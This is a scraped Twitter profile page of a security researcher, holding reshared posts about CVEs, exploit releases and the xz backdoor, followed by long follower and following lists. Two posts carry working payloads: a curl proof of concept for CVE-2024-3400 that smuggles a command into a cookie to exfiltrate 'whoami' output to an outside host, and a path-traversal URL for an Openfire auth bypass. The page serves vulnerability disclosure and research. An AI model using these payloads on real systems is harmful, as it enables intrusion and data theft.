_0xf4n9x_ @_0xf4n9x_
CyberSec Enthusiast, Security Researcher, RedTeam, Security Automation, ❣️OpenSource github.com/0xf4n9x Joined June 2019-
Tweets248
-
Followers5K
-
Following99
-
Likes2K
🚀 CodeQL zero to hero part 3: Security research with CodeQL! Learn how to audit applications for vulnerabilities with CodeQL, tricks we can use for security research workflow, and how to find bugs in thousands of GitHub repos at once using MRVA. github.blog/2024-04-29-cod…
#CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Path Traversal -> File Write -> OS Command Injection POC: curl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'
#CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Path Traversal -> File Write -> OS Command Injection POC: curl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'
The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.
🔍 New POC Available! We’ve developed a Proof of Concept for CVE-2023-20198 in #Cisco IOS XE. This authentication-bypass allows an attacker to create new users with privilege level 15. Check out the details in horizon3.ai/cisco-ios-xe-c…
#CVE-2023-20198 #Cisco IOS XE Authentication Bypass #RCE Ref: horizon3.ai/cisco-ios-xe-c…
F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclose this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve
we're back - causing trouble with more enterprise-grade firewalls :-) join us on the journey... labs.watchtowr.com/yet-more-unaut…
Reproducing CVE-2023-38646: Metabase Pre-auth RCE blog.calif.io/p/reproducing-… CC @peterjson @testanull
#CVE-2023-32315 Openfire Admin Console Auth Bypass #POC: /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp Ref: github.com/advisories/GHS… Credit to @Siebene7
🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight. summoning.team/blog/vmware-vr…
Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to @iagox86, @stephenfewer, and @_CField for their work on this. attackerkb.com/topics/mXmV0Yp…
🚨 1/ Ongoing campaign primarily targeting security researchers here on Twitter. Possibly they are trying to exploit some vulnerability in Internet Explorer and database tools like Navicat. I haven't been able to get the malicious payload yet, but something fishy is going on 🤔
流行代理软件Clash CSRF未授权配置重载致使RCE 0xf4n9x.github.io/2022/10/20/cla…
@levilla_testi @pdnuclei It's been updated now with the PR github.com/projectdiscove… by @_0xf4n9x_ 🫡
CVE-2023-27524, a dangerous default configuration in #Apache #Superset, allows an unauth attacker to: 🔺 Gain RCE 🔺 Harvest Creds 🔺 Compromise Data We estimate there are roughly 2K+ servers on the Internet affected by this issue. horizon3.ai/cve-2023-27524…
CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC. @pdnuclei Template - github.com/projectdiscove… cc @iamnoooob @wvuuuuuuuuuuuuu !
Multiple critical vulnerabilities in Strapi <=4.7.1 and all versions <=4.5.5 are vulnerable to unauthenticated RCE. For further details, check out my blog article: ghostccamm.com/blog/multi_str… @strapijs will be releasing their public disclosure soon!
Md Ismail Šojal �... @0x0SojalSec
31K Followers 5K Following Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project @AIStrikeSec || 0ld Accounts Suspended @0xSojalSec ||
CX @cxaqhq
4K Followers 407 Following BG6VVA OSWP 备考OSCP business card:https://t.co/2eYXkaAi6C Github:https://t.co/9HXCpbOWqe
𝕎𝕠𝕝𝕗 𝕋... @WolfTrainer_101
7K Followers 747 Following 开源情报爱好者 |网络威胁观察员 |前沿攻防技术研究员 | 云渗透测试认证专家 | 📰OSINTer |⚠️Threat Intelligence Hunter|🚩Redteam Researcher |📚Certified Cloud Penetration Test Professional
siri@fu4k1 @sirifu4k1
7K Followers 309 Following Web Pentest & girl hh & share anything ithink useful about infosec. follow me! 🇸🇬
crazyman_army @CrazymanArmy
6K Followers 3K Following CTFer / APT hunter / RedTeam / BlueTeam the member of @r3kapig the leader of @ShadowChasing1 CVE-2022-30190 find job opportunities opinions are own not group
⬆⬆⬇⬇⬅➡⬅... @NostalgiaHelper
66K Followers 5K Following
Tuan Anh Nguyen⚡️... @haxor31337
15K Followers 2K Following 29 y/o Bug Bounty Hunter and Red Teamer at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @Bugcrowd
Adam @Adam58616851
5K Followers 842 Following I'm just a simple man chasing freedom and peace. 自由职业追求中,暴躁在线综合征治疗中,硬件爱好者,半吊子搞安全的,尽量完美主义追求者,儒道释三家教徒,大陆互联网难民,应润尽润
曾哥 @AabyssZG
11K Followers 1K Following 渊龙Sec安全团队(AabyssTeam)创始人 国际云安全联盟(CSA)渗透测试工作组成员 渗透测试 | 造轮达人 | 追洞达人|RedTeam | IOT安全|业余无线电| SecTools | Misc业余选手 | Exploits
Clandestine @akaclandestine
50K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting | Humint |
F0jx @DhmhtrhsXat
7 Followers 216 Following
perd @perd990
83 Followers 891 Following
q @q0439083356750
0 Followers 52 Following
armin @armin2211001
10 Followers 318 Following
Tung beo @mrbeo4194
6 Followers 46 Following
Enrico Leannon @EnricoLean54572
90 Followers 4K Following
Nick Ye @Ja3onN1ck
6 Followers 177 Following
tarantularifat @tarantularifat
2 Followers 813 Following
Mr.zhang @zhangxi26163756
3 Followers 158 Following
Chumy @rm_rf_chumy
26 Followers 59 Following
Fthgb @bili2058600
45 Followers 1K Following As a college student studying the application of information security technology, I am working hard to move forward.
s+r0n93r @HyperKopite
12 Followers 204 Following @LFC fan. Postgraduate of @GWtweets researching on #CyberSecurity. Network Security Engineer @Huawei
Victorique @VingSec
0 Followers 82 Following
c @c8538696894353
0 Followers 53 Following
勃然大璐 @Misaka07323650
3 Followers 104 Following
JH @JH52820304
0 Followers 49 Following
CH Kim @_olioilo_
3 Followers 172 Following
Junhyun Cho @JunhyunCho_3311
0 Followers 14 Following
denny @kjd7733
0 Followers 25 Following
xforwp @xforwp
0 Followers 28 Following
jihun kim @jihunkim122229
0 Followers 27 Following
안재원 @anjaewon777
0 Followers 26 Following
연승현 @michap___
0 Followers 30 Following
codekia @codekias
4 Followers 108 Following
Black Swan @blackswan171
516 Followers 7K Following
김영훈 @hhjeon444
0 Followers 27 Following
남진현 @felix2775
0 Followers 30 Following
팕 @kaebtinbag38499
0 Followers 29 Following
소상웅 @uuoongi
0 Followers 30 Following
qm pip @PipQm85023
0 Followers 26 Following
zinratom @Wegon94
0 Followers 30 Following
kiik @kiik2096206
0 Followers 26 Following
marshmallow @ChaeyoungK63466
0 Followers 28 Following
ZoomEye @zoomeye_team
9K Followers 508 Following A cyberspace search engine built for security researcher Daily Tricks || Latest Vulnerability Updates Email: [email protected] https://t.co/AUq5jNpKkl
veigar___ @veigar265874
2 Followers 71 Following
一 千 @derderjiafox
0 Followers 68 Following
lool0x01 @lool0x01
353 Followers 1K Following Aspiring Bug Bounty | The Road to Becoming a Bug Hunter Starts From Here 🐞
cl0v3 @cll0v3
39 Followers 734 Following
AL20 @CcElliot09
5 Followers 395 Following
َ @utdtgvcsw
0 Followers 2K Following
bug01 @xbug01
2 Followers 118 Following
☣ KitPloit - Hacker... @KitPloit
119K Followers 3K Following Hacking and PenTest Tools for your Security Arsenal!
pyn3rd @pyn3rd
14K Followers 607 Following Security Researcher&Red Team&Cloud Security. BlackHat&HITB&CanSecWest Speaker.
⬆⬆⬇⬇⬅➡⬅... @NostalgiaHelper
66K Followers 5K Following
ProjectDiscovery @pdiscoveryio
38K Followers 132 Following Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives.
Critical Thinking - B... @ctbbpodcast
22K Followers 69 Following A 'by Hackers for Hackers' podcast focused on technical content ranging from bug bounty tips, to write-up explanations, to the latest exploitation techniques.
Nico Waisman @nicowaisman
13K Followers 952 Following Head of Security at @XBOW. Former CISO @Lyft. Binary entomologist
XBOW @Xbow
10K Followers 6 Following Bringing AI to offensive security by autonomously finding and exploiting web vulnerabilities. Watch XBOW hack things: https://t.co/D5Mco1u8zM
Oege de Moor @oegerikus
6K Followers 603 Following CEO and founder of XBOW. Previously: Founder of GitHub Next, founder of GitHub Copilot, CEO and founder of Semmle (GitHub Advanced Security), prof at Oxford.
Duy Tran @khanhduytran0
6K Followers 198 Following @PLaunchTeam(ex), LiveContainer, TrollPad; iOS internal explorer JB repo: https://t.co/2ytwlbwGIx [email protected] https://t.co/6W1ngT0prC
AltStore.io @altstoreio
97K Followers 3 Following A home for apps that push the boundaries of iOS — no jailbreak required. By @rileytestut @shanegillio Now on Mastodon! https://t.co/0UKkB0elyh
Semgrep @semgrep
4K Followers 201 Following A fast, open-source, static analysis tool for profoundly improving software security and reliability.
Huy Nguyen @Little_34306
17K Followers 281 Following i do nothing, others platform: https://t.co/qY3jaBjkDn
Sideloadly.io @Sideloadly
5K Followers 3 Following iOS, Apple Silicon & TV Sideloading - https://t.co/lCrrYGaOw3 Please use https://t.co/3g562tNyiy for support. Support us on https://t.co/5H1PEtmggj
/* BlazingWind */ @BlazingWindSec
258 Followers 502 Following Security researcher at @GHSecurityLab. Views are my own.
GeoSn0w @FCE365
121K Followers 585 Following Award-Winning YouTuber. Jailbreak Developer. https://t.co/7Kkd7MCWv6 | Bringing You Jailbreak News @ iDevice Central: https://t.co/VrSFuS1oDR
Praetorian @praetorianlabs
8K Followers 1K Following At Praetorian, our mission is clear: prevent breaches before they happen by emulating real-world attackers. That’s the power of #ContinuousOffensiveSecurity.
SinSinology @SinSinology
11K Followers 683 Following Pwn2Own 20{22,23,24,24.5,25,25.5}, i look for 0-Days but i find N-Days & i chase oranges 🍊
Assetnote @assetnote
10K Followers 0 Following Assetnote combines advanced reconnaissance and high-signal continuous security analysis to help enterprises gain insight and control of their evolving exposure.
Germán Fernández @1ZRR4H
35K Followers 461 Following 🏴☠️ OFFENSIVE-INTEL 🏴☠️ Cyber Threat Intelligence by Hackers | Security Researcher en https://t.co/rDrSxZASB3 | @CuratedIntel Member | 🥷🧠🇨🇱
MalwareHunterTeam @malwrhunterteam
244K Followers 38 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.
Horizon3 Attack Team @Horizon3Attack
12K Followers 56 Following @Horizon3ai Attack Team | Security Research | Exploit Dev | TTPs
LeakIX @leak_ix
7K Followers 235 Following Provide comprehensive visibility into internet-facing assets. Looking for vulnerabilities and misconfigurations 24/7 since 2020. https://t.co/MEjkffN1xg
starlabs @starlabs_sg
9K Followers 21 Following A Singapore company that discovers vulnerabilities to help customers mitigate the risks of cyber attacks. Organisers of @offbyoneconf
forgedhallpass @forgedhallpass
985 Followers 900 Following DevSecOps Director | cybersecurity | automation | development | open-source contributor & maintainer | @OWASP CSRFGuard Leader | builder ↔ breaker |
Nagli @galnagli
39K Followers 482 Following Hacker; Head of Threat Exposure at @wiz_io 🧙♂️; Bug Bounty Hunter; Live Hacking Events Winner
Geekboy @emgeekboy
25K Followers 452 Following Hacker, Co-Founder @pdiscoveryio, Ex-Security Analyst / BugBounty @Hacker0x01
HackerOne @Hacker0x01
325K Followers 3K Following The only official HackerOne Twitter account. A global leader in offensive security solutions. #HackForGood #togetherwehitharder
Alvaro Muñoz @pwntester
13K Followers 514 Following Security Researcher with @XBOW. CTF #int3pids. Opinions here are mine! bluesky: https://t.co/9HRRzpBECt
remy🐀 @_mattata
7K Followers 3K Following Dad, Vulnerability Research, Packet connoisseur. He/Him. Cyber Security Architect @GreyNoiseIO, DM's open. Top percentage Rattata. #cve #infosec #cybersecurity
Emad Shanab - أبو ... @Alra3ees
51K Followers 601 Following Father | Lawyer | Bug Bounty Hunter | Complete newbie | Every Law has its own Bugs. https://t.co/Cwuy2zfF8N https://t.co/Bd9ltJWS5X
j3ssie (Ai Ho) @j3ssiejjj
4K Followers 1K Following A passionate security engineer and creator of @OsmedeusEngine, Metabigor, and Jaeles.
Source Incite @sourceincite
3K Followers 4 Following We are Incite Team. Providing high quality Vulnerability Research & Training Services.
GreyNoise @GreyNoiseIO
28K Followers 158 Following GreyNoise analyzes Internet background noise. Use GreyNoise to remove pointless security alerts, find compromised devices, or identify emerging threats.
Elliot @ElliotKillick
3K Followers 40 Following Security engineer and researcher | Elliot on Security
GitHub Security Lab @GHSecurityLab
26K Followers 15 Following GitHub Security Lab’s mission is to inspire and enable the community to secure the open source software we all depend on.
Swissky @pentest_swissky
20K Followers 1K Following RedTeam | Pentest Author of PayloadsAllTheThings & SSRFmap https://t.co/w1ZLRqoafG
vx-underground @vxunderground
376K Followers 292 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected
sw33tLie @sw33tLie
10K Followers 916 Following Web application hacker, 25yo. Top 30 @ https://t.co/wX0yr85Tzk https://t.co/ZI7a8oJJcQ https://t.co/LGYK7tMOGo
James Kettle @albinowax
79K Followers 94 Following Director of Research at @PortSwigger aka @Burp_Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
🥝🏳️🌈 Be... @gentilkiwi
62K Followers 286 Following A kiwi coding mimikatz & kekeo github: https://t.co/eS3LVgU6i0 Head of security services @banquedefrance Tweets are my own and not the views of my employer
RedDrip Team @RedDrip7
16K Followers 29 Following Technical Twitter of QiAnXin Technology, leading Chinese security vendor. It is operated by RedDrip Team which focuses on malware, APT and threat intelligence.
wvu @wvuuuuuuuuuuuuu
6K Followers 2K Following Sentient one-liner grepping the Internet for signs of intelligence. VulnCheck. Previously Atredis, Rapid7 vuln research, and Metasploit.
Ignis @ahakcil
2K Followers 283 Following Ata Hakcil Mad Scientist | ML/AI researcher | Vulnerability Researcher || 🐒 ||
n @buxiugangpifa
138 Followers 1K Following
The Daily Swig @DailySwig
11K Followers 393 Following Web security news and views. The latest on bug bounty programs, technical research, hacking tools, and more. DMs open for tips.
PortSwigger Research @PortSwiggerRes
111K Followers 7 Following Web security research from the team at @PortSwiggerTrends for United States
You might like
